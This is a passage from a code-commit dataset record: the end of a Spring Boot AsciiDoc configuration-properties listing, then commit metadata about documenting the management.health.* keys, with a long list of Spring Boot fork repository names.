({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\t# GIT INFO\n\tspring.git.properties= # resource ref to generated git info properties file\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2416a935e6ca64b76a917a2287c12fe7fb3653b0","subject":"Properly document health indicator config","message":"Properly document health indicator config\n\nHealth indicator configuration keys have moved from the health.* to the\nmanagement.health.* namespace. This commit makes sure that these are\ndocumented properly in 1.1.x as well.\n\nSee gh-2118\n","repos":"tsachev\/spring-boot,linead\/spring-boot,lucassaldanha\/spring-boot,mebinjacob\/spring-boot,bsodzik\/spring-boot,pnambiarsf\/spring-boot,lenicliu\/spring-boot,candrews\/spring-boot,marcellodesales\/spring-boot,liupd\/spring-boot,Xaerxess\/spring-boot,eliudiaz\/spring-boot,pnambiarsf\/spring-boot,yangdd1205\/spring-boot,jrrickard\/spring-boot,existmaster\/spring-boot,shangyi0102\/spring-boot,christian-posta\/spring-boot,liupugong\/spring-boot,fulvio-m\/spring-boot,yuxiaole\/spring-boot,nghialunhaiha\/spring-boot,jbovet\/spring-boot,roymanish\/spring-boot,zorosteven\/spring-boot,lexandro\/spring-boot,joshthornhill\/spring-boot,ameraljovic\/spring-boot,izestrea\/spring-boot,philwebb\/spring-boot,donhuvy\/spring-boot,crackien\/spring-boot,bclozel\/spring-boot,liupugong\/spring-boot,mosen11\/spring-boot,smilence1986\/spring-boot,JiweiWong\/spring-boot,hqrt\/jenkins2-course-spring-boot,mosen11\/spring-boot,mbogoevici\/spring-boot,fireshort\/spring-boot,sankin\/spring-boot,M3lkior\/spring-boot,nisuhw\/spring-boot,wilkinsona\/spring-boot,clarklj001\/spring-boot,5zzang\/spring-boot,buobao\/spring-boot,yuxiaole\/spring-boot,lucassaldanha\/spring-boot,wwadge\/spring-boot,artembilan\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,huangyugui\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,nurkiewicz\/spring-boot,NetoDevel\/spring-boot,vpavic\/spring-boot,dnsw83\/spring-boot,rizwan18\/spring-boot,fireshort\/spring-boot,mrumpf\/spring-boot,gauravbrills\/spring-boot,gauravbrills\/spring-boot,durai145\/spring-boot,MasterRoots\/spring-boot,tsachev\/spring-boot,i007422\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,bjornlindstrom\/spring-boot,166yuan\/spring-boot,designreuse\/spring-boot,hklv\/spring-boot,forestqqqq\/spring-boot,RobertNickens\/spring-boot,DeezCashews\/spring-boot,10045125\/spring-boot,izeye\/spring-boot,SaravananParthasarathy\/SPSDemo,deki\/spring-boot,tbadie\/spring-boot,designreuse\/spring-boot,MasterRoots\/spring-boot,Pokbab\/spring-boot,tan9\/spring-boot,RainPlanter\/spring-boot,donthadineshkumar\/spring-boot,peteyan\/spring-boot,tbbost\/spring-boot,prakashme\/spring-boot,izestrea\/spring-boot,durai145\/spring-boot,wilkinsona\/spring-boot,yhj630520\/spring-boot,royclarkson\/spring-boot,mbrukman\/spring-boot,ralenmandao\/spring-boot,donthadineshkumar\/spring-boot,keithsjohnson\/spring-boot,end-user\/spring-boot,balajinsr\/spring-boot,akmaharshi\/jenkins,thomasdarimont\/spring-boot,wwadge\/spring-boot,PraveenkumarShethe\/spring-boot,npcode\/spring-boot,PraveenkumarShethe\/spring-boot,rstirling\/spring-boot,tsachev\/spring-boot,jcastaldoFoodEssentials\/spring-boot,lingounet\/spring-boot,ptahchiev\/spring-boot,nghialunhaiha\/spring-boot,hello2009chen\/spring-boot,Nowheresly\/spring-boot,mouadtk\/spring-boot,AstaTus\/spring-boot,ydsakyclguozi\/spring-boot,qq83387856\/spring-boot,bbrouwer\/spring-boot,axelfontaine\/spring-boot,Makhlab\/spring-boot,minmay\/spring-boot,Charkui\/spring-boot,meftaul\/spring-boot,scottfrederick\/spring-boot,auvik\/spring-boot,mbenson\/spring-boot,mbnshankar\/spring-boot,izeye\/spring-boot,5zzang\/spring-boot,RobertNickens\/spring-boot,satheeshmb\/spring-boot,mackeprm\/spring-boot,axibase\/spring-boot,mdeinum\/spring-boot,pvorb\/spring-boot,keithsjohnson\/spring-boot,qq83387856\/spring-boot,rmoorman\/spring-boot,domix\/spring-boot,jvz\/spring-boot,jjankar\/spring-boot,jcastaldoFoodEssentials\/spring-boot,ralenmandao\/spring-boot,vakninr\/spring-boot,jack-luj\/spring-boot,roymanish\/spring-boot,eonezhang\/spring-boot,5zzang\/spring-boot,paweldolecinski\/spring-boot,soul2zimate\/spring-boot,tiarebalbi\/spring-boot,vakninr\/spring-boot,mosoft521\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,felipeg48\/spring-boot,jbovet\/spring-boot,donhuvy\/spring-boot,meloncocoo\/spring-boot,gorcz\/spring-boot,tbadie\/spring-boot,imranansari\/spring-boot,allyjunio\/spring-boot,meftaul\/spring-boot,bbrouwer\/spring-boot,liupd\/spring-boot,Pokbab\/spring-boot,nevenc-pivotal\/spring-boot,coolcao\/spring-boot,xingguang2013\/spring-boot,xdweleven\/spring-boot,balajinsr\/spring-boot,lburgazzoli\/spring-boot,tbadie\/spring-boot,Buzzardo\/spring-boot,bijukunjummen\/spring-boot,smayoorans\/spring-boot,bclozel\/spring-boot,xiaoleiPENG\/my-project,smayoorans\/spring-boot,drumonii\/spring-boot,Nowheresly\/spring-boot,dnsw83\/spring-boot,nelswadycki\/spring-boot,sebastiankirsch\/spring-boot,rams2588\/spring-boot,wwadge\/spring-boot,dfa1\/spring-boot,krmcbride\/spring-boot,akmaharshi\/jenkins,jack-luj\/spring-boot,panbiping\/spring-boot,bbrouwer\/spring-boot,ollie314\/spring-boot,ApiSecRay\/spring-boot,sbuettner\/spring-boot,shakuzen\/spring-boot,zhangshuangquan\/spring-root,cmsandiga\/spring-boot,wilkinsona\/spring-boot,sbcoba\/spring-boot,murilobr\/spring-boot,yangdd1205\/spring-boot,nghiavo\/spring-boot,joshiste\/spring-boot,SPNilsen\/spring-boot,frost2014\/spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,vpavic\/spring-boot,lenicliu\/spring-boot,master-slave\/spring-boot,ralenmandao\/spring-boot,mbrukman\/spring-boot,nghiavo\/spring-boot,michael-simons\/spring-boot,jforge\/spring-boot,brettwooldridge\/spring-boot,lexandro\/spring-boot,huangyugui\/spring-boot,artembilan\/spring-boot,ilayaperumalg\/spring-boot,ollie314\/spring-boot,donthadineshkumar\/spring-boot,domix\/spring-boot,prasenjit-net\/spring-boot,raiamber1\/spring-boot,hklv\/spring-boot,habuma\/spring-boot,paddymahoney\/spring-boot,JiweiWong\/spring-boot,RobertNickens\/spring-boot,Chomeh\/spring-boot,srinivasan01\/spring-boot,lokbun\/spring-boot,SPNilsen\/spring-boot,eliudiaz\/spring-boot,imranansari\/spring-boot,hehuabing\/spring-boot,ihoneymon\/spring-boot,mabernardo\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,donhuvy\/spring-boot,jvz\/spring-boot,cleverjava\/jenkins2-course-spring-boot,kiranbpatil\/spring-boot,trecloux\/spring-boot,duandf35\/spring-boot,vaseemahmed01\/spring-boot,lcardito\/spring-boot,mlc0202\/spring-boot,ihoneymon\/spring-boot,donthadineshkumar\/spring-boot,nisuhw\/spring-boot,domix\/spring-boot,zorosteven\/spring-boot,orangesdk\/spring-boot,imranansari\/spring-boot,trecloux\/spring-boot,joshiste\/spring-boot,xc145214\/spring-boot,qerub\/spring-boot,orangesdk\/spring-boot,kamilszymanski\/spring-boot,ihoneymon\/spring-boot,DONIKAN\/spring-boot,navarrogabriela\/spring-boot,joansmith\/spring-boot,neo4j-contrib\/spring-boot,pvorb\/spring-boot,isopov\/spring-boot,okba1\/spring-boot,domix\/spring-boot,donhuvy\/spring-boot,tiarebalbi\/spring-boot,gorcz\/spring-boot,akmaharshi\/jenkins,ojacquemart\/spring-boot,i007422\/jenkins2-course-spring-boot,master-slave\/spring-boot,tbbost\/spring-boot,yunbian\/spring-boot,linead\/spring-boot,mouadtk\/spring-boot,lokbun\/spring-boot,marcellodesales\/spring-boot,vpavic\/spring-boot,mabernardo\/spring-boot,tiarebalbi\/spring-boot,snicoll\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,balajinsr\/spring-boot,herau\/spring-boot,Nowheresly\/spring-boot,lingounet\/spring-boot,xialeizhou\/spring-boot,coolcao\/spring-boot,existmaster\/spring-boot,xc145214\/spring-boot,ydsakyclguozi\/spring-boot,satheeshmb\/spring-boot,nevenc-pivotal\/spring-boot,murilobr\/spring-boot,RishikeshDarandale\/spring-boot,cmsandiga\/spring-boot,pnambiarsf\/spring-boot,Pokbab\/spring-boot,joansmith\/spring-boot,scottfrederick\/spring-boot,NetoDevel\/spring-boot,mbenson\/spring-boot,xc145214\/spring-boot,vandan16\/Vandan,mrumpf\/spring-boot,chrylis\/spring-boot,kayelau\/spring-boot,hehuabing\/spring-boot,mabernardo\/spring-boot,rmoorman\/spring-boot,kamilszymanski\/spring-boot,ChunPIG\/spring-boot,mdeinum\/spring-boot,fulvio-m\/spring-boot,drumonii\/spring-boot,ptahchiev\/spring-boot,PraveenkumarShethe\/spring-boot,spring-projects\/spring-boot,ralenmandao\/spring-boot,nelswadycki\/spring-boot,paweldolecinski\/spring-boot,RishikeshDarandale\/spring-boot,RichardCSantana\/spring-boot,damoyang\/spring-boot,SPNilsen\/spring-boot,mosoft521\/spring-boot,soul2zimate\/spring-boot,joshthornhill\/spring-boot,royclarkson\/spring-boot,brettwooldridge\/spring-boot,designreuse\/spring-boot,jeremiahmarks\/spring-boot,Buzzardo\/spring-boot,wwadge\/spring-boot,patrikbeno\/spring-boot,bbrouwer\/spring-boot,navarrogabriela\/spring-boot,rstirling\/spring-boot,nurkiewicz\/spring-boot,duandf35\/spring-boot,philwebb\/spring-boot-concourse,eric-stanley\/spring-boot,M3lkior\/spring-boot,bijukunjummen\/spring-boot,kamilszymanski\/spring-boot,mbrukman\/spring-boot,dnsw83\/spring-boot,eddumelendez\/spring-boot,xingguang2013\/spring-boot,i007422\/jenkins2-course-spring-boot,Xaerxess\/spring-boot,mbnshankar\/spring-boot,meloncocoo\/spring-boot,duandf35\/spring-boot,johnktims\/spring-boot,jvz\/spring-boot,nareshmiriyala\/spring-boot,drumonii\/spring-boot,playleud\/spring-boot,durai145\/spring-boot,srikalyan\/spring-boot,JiweiWong\/spring-boot,philwebb\/spring-boot-concourse,existmaster\/spring-boot,eliudiaz\/spring-boot,mebinjacob\/spring-boot,MrMitchellMoore\/spring-boot,end-user\/spring-boot,okba1\/spring-boot,qerub\/spring-boot,mosoft521\/spring-boot,Chomeh\/spring-boot,Chomeh\/spring-boot,yhj630520\/spring-boot,mrumpf\/spring-boot,htynkn\/spring-boot,rmoorman\/spring-boot,DONIKAN\/spring-boot,dreis2211\/spring-boot,mosen11\/spring-boot,jforge\/spring-boot,javyzheng\/spring-boot,nisuhw\/spring-boot,RichardCSantana\/spring-boot,Buzzardo\/spring-boot,jayarampradhan\/spring-boot,jeremiahmarks\/spring-boot,rickeysu\/spring-boot,herau\/spring-boot,rweisleder\/spring-boot,lingounet\/spring-boot,nevenc-pivotal\/spring-boot,end-user\/spring-boot,ojacquemart\/spring-boot,ApiSecRay\/spring-boot,ractive\/spring-boot,M3lkior\/spring-boot,nandakishorm\/spring-boot,srinivasan01\/spring-boot,soul2zimate\/spring-boot,izestrea\/spring-boot,sbcoba\/spring-boot,jeremiahmarks\/spring-boot,cbtpro\/spring-boot,javyzheng\/spring-boot,sbuettner\/spring-boot,jorgepgjr\/spring-boot,fjlopez\/spring-boot,eliudiaz\/spring-boot,jrrickard\/spring-boot,prasenjit-net\/spring-boot,ilayaperumalg\/spring-boot,joshiste\/spring-boot,jayarampradhan\/spring-boot,sungha\/spring-boot,dnsw83\/spring-boot,candrews\/spring-boot,ilayaperumalg\/spring-boot,paweldolecinski\/spring-boot,tan9\/spring-boot,mabernardo\/spring-boot,philwebb\/spring-boot,vaseemahmed01\/spring-boot,mosen11\/spring-boot,bsodzik\/spring-boot,sungha\/spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,fogone\/spring-boot,eonezhang\/spring-boot,joansmith\/spring-boot,srikalyan\/spring-boot,aahlenst\/spring-boot,VitDevelop\/spring-boot,rams2588\/spring-boot,nghiavo\/spring-boot,tan9\/spring-boot,cmsandiga\/spring-boot,sebastiankirsch\/spring-boot,bsodzik\/spring-boot,meftaul\/spring-boot,zorosteven\/spring-boot,isopov\/spring-boot,cleverjava\/jenkins2-course-spring-boot,chrylis\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,rams2588\/spring-boot,yuxiaole\/spring-boot,jeremiahmarks\/spring-boot,drunklite\/spring-boot,nandakishorm\/spring-boot,dreis2211\/spring-boot,okba1\/spring-boot,nebhale\/spring-boot,ptahchiev\/spring-boot,kiranbpatil\/spring-boot,deki\/spring-boot,sbuettner\/spring-boot,vaseemahmed01\/spring-boot,ydsakyclguozi\/spring-boot,Buzzardo\/spring-boot,crackien\/spring-boot,AstaTus\/spring-boot,sebastiankirsch\/spring-boot,SPNilsen\/spring-boot,candrews\/spring-boot,Chomeh\/spring-boot,axibase\/spring-boot,crackien\/spring-boot,joshiste\/spring-boot,rstirling\/spring-boot,fjlopez\/spring-boot,master-slave\/spring-boot,scottfrederick\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot-concourse,existmaster\/spring-boot,vpavic\/spring-boot,cleverjava\/jenkins2-course-spring-boot,krmcbride\/spring-boot,yuxiaole\/spring-boot,jayarampradhan\/spring-boot,ydsakyclguozi\/spring-boot,mohican0607\/spring-boot,ptahchiev\/spring-boot,roberthafner\/spring-boot,afroje-reshma\/spring-boot-sample,neo4j-contrib\/spring-boot,fogone\/spring-boot,hehuabing\/spring-boot,imranansari\/spring-boot,MrMitchellMoore\/spring-boot,ptahchiev\/spring-boot,lif123\/spring-boot,eric-stanley\/spring-boot,lcardito\/spring-boot,tsachev\/spring-boot,na-na\/spring-boot,bsodzik\/spring-boot,roberthafner\/spring-boot,jcastaldoFoodEssentials\/spring-boot,joshiste\/spring-boot,rweisleder\/spring-boot,prakashme\/spring-boot,VitDevelop\/spring-boot,minmay\/spring-boot,gauravbrills\/spring-boot,tbadie\/spring-boot,paddymahoney\/spring-boot,cbtpro\/spring-boot,christian-posta\/spring-boot,meloncocoo\/spring-boot,nebhale\/spring-boot,kayelau\/spring-boot,javyzheng\/spring-boot,spring-projects\/spring-boot,AngusZhu\/spring-boot,hehuabing\/spring-boot,nurkiewicz\/spring-boot,afroje-reshma\/spring-boot-sample,ChunPIG\/spring-boot,scottfrederick\/spring-boot,ApiSecRay\/spring-boot,vaseemahmed01\/spring-boot,ameraljovic\/spring-boot,shangyi0102\/spring-boot,xwjxwj30abc\/spring-boot,jorgepgjr\/spring-boot,mohican0607\/spring-boot,philwebb\/spring-boot,qq83387856\/spring-boot,liupd\/spring-boot,MasterRoots\/spring-boot,npcode\/spring-boot,ollie314\/spring-boot,roberthafner\/spring-boot,roberthafner\/spring-boot,joshthornhill\/spring-boot,allyjunio\/spring-boot,zhanhb\/spring-boot,pvorb\/spring-boot,jvz\/spring-boot,shakuzen\/spring-boot,xwjxwj30abc\/spring-boot,felipeg48\/spring-boot,166yuan\/spring-boot,roberthafner\/spring-boot,ractive\/spring-boot,na-na\/spring-boot,murilobr\/spring-boot,ameraljovic\/spring-boot,xiaoleiPENG\/my-project,patrikbeno\/spring-boot,durai145\/spring-boot,liupugong\/spring-boot,christian-posta\/spring-boot,shakuzen\/spring-boot,lif123\/spring-boot,lingounet\/spring-boot,nelswadycki\/spring-boot,zorosteven\/spring-boot,johnktims\/spring-boot,cbtpro\/spring-boot,deki\/spring-boot,i007422\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,isopov\/spring-boot,xingguang2013\/spring-boot,philwebb\/spring-boot,marcellodesales\/spring-boot,mebinjacob\/spring-boot,mebinjacob\/spring-boot,cmsandiga\/spring-boot,brettwooldridge\/spring-boot,raiamber1\/spring-boot,mbenson\/spring-boot,minmay\/spring-boot,bjornlindstrom\/spring-boot,kamilszymanski\/spring-boot,Pokbab\/spring-boot,orangesdk\/spring-boot,damoyang\/spring-boot,herau\/spring-boot,lenicliu\/spring-boot,mbnshankar\/spring-boot,qq83387856\/spring-boot,fulvio-m\/spring-boot,sbcoba\/spring-boot,tbbost\/spring-boot,cbtpro\/spring-boot,yhj630520\/spring-boot,ractive\/spring-boot,zhangshuangquan\/spring-root,rams2588\/spring-boot,DeezCashews\/spring-boot,dreis2211\/spring-boot,lburgazzoli\/spring-boot,chrylis\/spring-boot,johnktims\/spring-boot,srinivasan01\/spring-boot,wilkinsona\/spring-boot,thomasdarimont\/spring-boot,javyzheng\/spring-boot,durai145\/spring-boot,xialeizhou\/spring-boot,htynkn\/spring-boot,lexandro\/spring-boot,mbnshankar\/spring-boot,jmnarloch\/spring-boot,xwjxwj30abc\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rizwan18\/spring-boot,rickeysu\/spring-boot,orangesdk\/spring-boot,neo4j-contrib\/spring-boot,jbovet\/spring-boot,mbenson\/spring-boot,forestqqqq\/spring-boot,SPNilsen\/spring-boot,damoyang\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,linead\/spring-boot,brettwooldridge\/spring-boot,kamilszymanski\/spring-boot,ojacquemart\/spring-boot,neo4j-contrib\/spring-boot,mdeinum\/spring-boot,Makhlab\/spring-boot,vandan16\/Vandan,ChunPIG\/spring-boot,mosoft521\/spring-boot,tan9\/spring-boot,javyzheng\/spring-boot,10045125\/spring-boot,tsachev\/spring-boot,crackien\/spring-boot,nebhale\/spring-boot,PraveenkumarShethe\/spring-boot,hklv\/spring-boot,zhanhb\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,DeezCashews\/spring-boot,jeremiahmarks\/spring-boot,srikalyan\/spring-boot,jorgepgjr\/spring-boot,axelfontaine\/spring-boot,lcardito\/spring-boot,herau\/spring-boot,lburgazzoli\/spring-boot,fireshort\/spring-boot,mackeprm\/spring-boot,isopov\/spring-boot,tiarebalbi\/spring-boot,aahlenst\/spring-boot,jjankar\/spring-boot,eonezhang\/spring-boot,mouadtk\/spring-boot,hqrt\/jenkins2-course-spring-boot,lokbun\/spring-boot,lucassaldanha\/spring-boot,xialeizhou\/spring-boot,zorosteven\/spring-boot,RichardCSantana\/spring-boot,master-slave\/spring-boot,ihoneymon\/spring-boot,MasterRoots\/spring-boot,joshiste\/spring-boot,spring-projects\/spring-boot,royclarkson\/spring-boot,na-na\/spring-boot,kiranbpatil\/spring-boot,hello2009chen\/spring-boot,xingguang2013\/spring-boot,Makhlab\/spring-boot,smayoorans\/spring-boot,mouadtk\/spring-boot,deki\/spring-boot,playleud\/spring-boot,royclarkson\/spring-boot,fireshort\/spring-boot,huangyugui\/spring-boot,prasenjit-net\/spring-boot,scottfrederick\/spring-boot,mbnshankar\/spring-boot,mosen11\/spring-boot,SaravananParthasarathy\/SPSDemo,Nowheresly\/spring-boot,shangyi0102\/spring-boot,nevenc-pivotal\/spring-boot,jayeshmuralidharan\/spring-boot,RainPlanter\/spring-boot,dfa1\/spring-boot,AstaTus\/spring-boot,xdweleven\/spring-boot,ollie314\/spring-boot,thomasdarimont\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,rizwan18\/spring-boot,mouadtk\/spring-boot,nareshmiriyala\/spring-boot,trecloux\/spring-boot,AngusZhu\/spring-boot,existmaster\/spring-boot,mrumpf\/spring-boot,minmay\/spring-boot,lenicliu\/spring-boot,jorgepgjr\/spring-boot,master-slave\/spring-boot,MrMitchellMoore\/spring-boot,lexandro\/spring-boot,mbrukman\/spring-boot,lif123\/spring-boot,yunbian\/spring-boot,coolcao\/spring-boot,NetoDevel\/spring-boot,M3lkior\/spring-boot,Charkui\/spring-boot,vandan16\/Vandan,prakashme\/spring-boot,mohican0607\/spring-boot,ilayaperumalg\/spring-boot,yuxiaole\/spring-boot,balajinsr\/spring-boot,wilkinsona\/spring-boot,designreuse\/spring-boot,drumonii\/spring-boot,raiamber1\/spring-boot,izestrea\/spring-boot,buobao\/spring-boot,balajinsr\/spring-boot,auvik\/spring-boot,drunklite\/spring-boot,xc145214\/spring-boot,huangyugui\/spring-boot,bsodzik\/spring-boot,end-user\/spring-boot,jcastaldoFoodEssentials\/spring-boot,i007422\/jenkins2-course-spring-boot,felipeg48\/spring-boot,kdvolder\/spring-boot,playleud\/spring-boot,isopov\/spring-boot,marcellodesales\/spring-boot,drunklite\/spring-boot,dreis2211\/spring-boot,simonnordberg\/spring-boot,rickeysu\/spring-boot,philwebb\/spring-boot-concourse,murilobr\/spring-boot,buobao\/spring-boot,fulvio-m\/spring-boot,mackeprm\/spring-boot,philwebb\/spring-boot-concourse,hklv\/spring-boot,srinivasan01\/spring-boot,vpavic\/spring-boot,RainPlanter\/spring-boot,smilence1986\/spring-boot,coolcao\/spring-boot,olivergierke\/spring-boot,buobao\/spring-boot,herau\/spring-boot,RichardCSantana\/spring-boot,rstirling\/spring-boot,JiweiWong\/spring-boot,axelfontaine\/spring-boot,vandan16\/Vandan,isopov\/spring-boot,qerub\/spring-boot,nelswadycki\/spring-boot,jayeshmuralidharan\/spring-boot,RishikeshDarandale\/spring-boot,rweisleder\/spring-boot,michael-simons\/spring-boot,mike-kukla\/spring-boot,jrrickard\/spring-boot,zhangshuangquan\/spring-root,zhanhb\/spring-boot,izestrea\/spring-boot,VitDevelop\/spring-boot,tbadie\/spring-boot,liupd\/spring-boot,yhj630520\/spring-boot,krmcbride\/spring-boot,yunbian\/spring-boot,playleud\/spring-boot,Xaerxess\/spring-boot,marcellodesales\/spring-boot,Makhlab\/spring-boot,spring-projects\/spring-boot,olivergierke\/spring-boot,bijukunjummen\/spring-boot,roymanish\/spring-boot,sankin\/spring-boot,imranansari\/spring-boot,Charkui\/spring-boot,JiweiWong\/spring-boot,RishikeshDarandale\/spring-boot,christian-posta\/spring-boot,artembilan\/spring-boot,RainPlanter\/spring-boot,simonnordberg\/spring-boot,roymanish\/spring-boot,afroje-reshma\/spring-boot-sample,spring-projects\/spring-boot,nghiavo\/spring-boot,eddumelendez\/spring-boot,paweldolecinski\/spring-boot,okba1\/spring-boot,drumonii\/spring-boot,chrylis\/spring-boot,ilayaperumalg\/spring-boot,soul2zimate\/spring-boot,clarklj001\/spring-boot,forestqqqq\/spring-boot,nevenc-pivotal\/spring-boot,meloncocoo\/spring-boot,qerub\/spring-boot,olivergierke\/spring-boot,jxblum\/spring-boot,jcastaldoFoodEssentials\/spring-boot,rizwan18\/spring-boot,hklv\/spring-boot,rickeysu\/spring-boot,playleud\/spring-boot,domix\/spring-boot,olivergierke\/spring-boot,SaravananParthasarathy\/SPSDemo,bjornlindstrom\/spring-boot,olivergierke\/spring-boot,linead\/spring-boot,tbbost\/spring-boot,sungha\/spring-boot,smilence1986\/spring-boot,cbtpro\/spring-boot,lokbun\/spring-boot,nebhale\/spring-boot,zhanhb\/spring-boot,nghiavo\/spring-boot,panbiping\/spring-boot,mlc0202\/spring-boot,lenicliu\/spring-boot,raiamber1\/spring-boot,nisuhw\/spring-boot,allyjunio\/spring-boot,michael-simons\/spring-boot,bclozel\/spring-boot,PraveenkumarShethe\/spring-boot,auvik\/spring-boot,patrikbeno\/spring-boot,vakninr\/spring-boot,lexandro\/spring-boot,na-na\/spring-boot,vaseemahmed01\/spring-boot,5zzang\/spring-boot,chrylis\/spring-boot,gorcz\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,nghialunhaiha\/spring-boot,mike-kukla\/spring-boot,vakninr\/spring-boot,simonnordberg\/spring-boot,axibase\/spring-boot,afroje-reshma\/spring-boot-sample,liupugong\/spring-boot,duandf35\/spring-boot,mbenson\/spring-boot,donhuvy\/spring-boot,panbiping\/spring-boot,lburgazzoli\/spring-boot,frost2014\/spring-boot,tbbost\/spring-boot,thomasdarimont\/spring-boot,mike-kukla\/spring-boot,izeye\/spring-boot,mbogoevici\/spring-boot,ollie314\/spring-boot,mbogoevici\/spring-boot,M3lkior\/spring-boot,bclozel\/spring-boot,mbogoevici\/spring-boot,prakashme\/spring-boot,jmnarloch\/spring-boot,166yuan\/spring-boot,mbenson\/spring-boot,na-na\/spring-boot,paweldolecinski\/spring-boot,habuma\/spring-boot,jmnarloch\/spring-boot,ractive\/spring-boot,mbogoevici\/spring-boot,VitDevelop\/spring-boot,wilkinsona\/spring-boot,krmcbride\/spring-boot,yunbian\/spring-boot,trecloux\/spring-boot,rmoorman\/spring-boot,meloncocoo\/spring-boot,michael-simons\/spring-boot,peteyan\/spring-boot,xdweleven\/spring-boot,neo4j-contrib\/spring-boot,prasenjit-net\/spring-boot,NetoDevel\/spring-boot,ojacquemart\/spring-boot,mrumpf\/spring-boot,minmay\/spring-boot,sbuettner\/spring-boot,jayarampradhan\/spring-boot,xiaoleiPENG\/my-project,auvik\/spring-boot,fogone\/spring-boot,DONIKAN\/spring-boot,jjankar\/spring-boot,johnktims\/spring-boot,smilence1986\/spring-boot,VitDevelop\/spring-boot,huangyugui\/spring-boot,mdeinum\/spring-boot,lif123\/spring-boot,eric-stanley\/spring-boot,jforge\/spring-boot,ApiSecRay\/spring-boot,dfa1\/spring-boot,keithsjohnson\/spring-boot,aahlenst\/spring-boot,sbcoba\/spring-boot,rstirling\/spring-boot,izeye\/spring-boot,10045125\/spring-boot,joansmith\/spring-boot,rizwan18\/spring-boot,izeye\/spring-boot,jack-luj\/spring-boot,AstaTus\/spring-boot,zhanhb\/spring-boot,xiaoleiPENG\/my-project,jforge\/spring-boot,Charkui\/spring-boot,mlc0202\/spring-boot,habuma\/spring-boot,akmaharshi\/jenkins,shakuzen\/spring-boot,clarklj001\/spring-boot,AstaTus\/spring-boot,rweisleder\/spring-boot,nebhale\/spring-boot,zhangshuangquan\/spring-root,hello2009chen\/spring-boot,ptahchiev\/spring-boot,xialeizhou\/spring-boot,nareshmiriyala\/spring-boot,keithsjohnson\/spring-boot,christian-posta\/spring-boot,cleverjava\/jenkins2-course-spring-boot,akmaharshi\/jenkins,RishikeshDarandale\/spring-boot,jjankar\/spring-boot,joshthornhill\/spring-boot,duandf35\/spring-boot,eddumelendez\/spring-boot,michael-simons\/spring-boot,fogone\/spring-boot,hqrt\/jenkins2-course-spring-boot,Pokbab\/spring-boot,drunklite\/spring-boot,hqrt\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,yangdd1205\/spring-boot,joshthornhill\/spring-boot,habuma\/spring-boot,qq83387856\/spring-boot,jjankar\/spring-boot,aahlenst\/spring-boot,artembilan\/spring-boot,sankin\/spring-boot,eonezhang\/spring-boot,mlc0202\/spring-boot,htynkn\/spring-boot,clarklj001\/spring-boot,jbovet\/spring-boot,drumonii\/spring-boot,NetoDevel\/spring-boot,patrikbeno\/spring-boot,mbrukman\/spring-boot,fjlopez\/spring-boot,jxblum\/spring-boot,RobertNickens\/spring-boot,xwjxwj30abc\/spring-boot,forestqqqq\/spring-boot,AngusZhu\/spring-boot,ihoneymon\/spring-boot,RichardCSantana\/spring-boot,dfa1\/spring-boot,pnambiarsf\/spring-boot,felipeg48\/spring-boot,lcardito\/spring-boot,jrrickard\/spring-boot,xiaoleiPENG\/my-project,liupd\/spring-boot,candrews\/spring-boot,sbuettner\/spring-boot,jxblum\/spring-boot,xdweleven\/spring-boot,pvorb\/spring-boot,panbiping\/spring-boot,RobertNickens\/spring-boot,mackeprm\/spring-boot,hehuabing\/spring-boot,DONIKAN\/spring-boot,smilence1986\/spring-boot,smayoorans\/spring-boot,nandakishorm\/spring-boot,dreis2211\/spring-boot,rickeysu\/spring-boot,jayeshmuralidharan\/spring-boot,axelfontaine\/spring-boot,srinivasan01\/spring-boot,snicoll\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,krmcbride\/spring-boot,joansmith\/spring-boot,jxblum\/spring-boot,keithsjohnson\/spring-boot,RainPlanter\/spring-boot,Xaerxess\/spring-boot,kiranbpatil\/spring-boot,frost2014\/spring-boot,Charkui\/spring-boot,gorcz\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jforge\/spring-boot,npcode\/spring-boot,navarrogabriela\/spring-boot,navarrogabriela\/spring-boot,patrikbeno\/spring-boot,mohican0607\/spring-boot,chrylis\/spring-boot,cleverjava\/jenkins2-course-spring-boot,auvik\/spring-boot,scottfrederick\/spring-boot,roymanish\/spring-boot,npcode\/spring-boot,mike-kukla\/spring-boot,simonnordberg\/spring-boot,jayeshmuralidharan\/spring-boot,nghialunhaiha\/spring-boot,drunklite\/spring-boot,tsachev\/spring-boot,allyjunio\/spring-boot,Buzzardo\/spring-boot,mackeprm\/spring-boot,fjlopez\/spring-boot,sbcoba\/spring-boot,gorcz\/spring-boot,sebastiankirsch\/spring-boot,felipeg48\/spring-boot,AngusZhu\/spring-boot,ojacquemart\/spring-boot,pnambiarsf\/spring-boot,dnsw83\/spring-boot,yhj630520\/spring-boot,wwadge\/spring-boot,jorgepgjr\/spring-boot,xc145214\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,nelswadycki\/spring-boot,hqrt\/jenkins2-course-spring-boot,5zzang\/spring-boot,MasterRoots\/spring-boot,jayarampradhan\/spring-boot,cmsandiga\/spring-boot,nghialunhaiha\/spring-boot,MrMitchellMoore\/spring-boot,fjlopez\/spring-boot,smayoorans\/spring-boot,mabernardo\/spring-boot,eri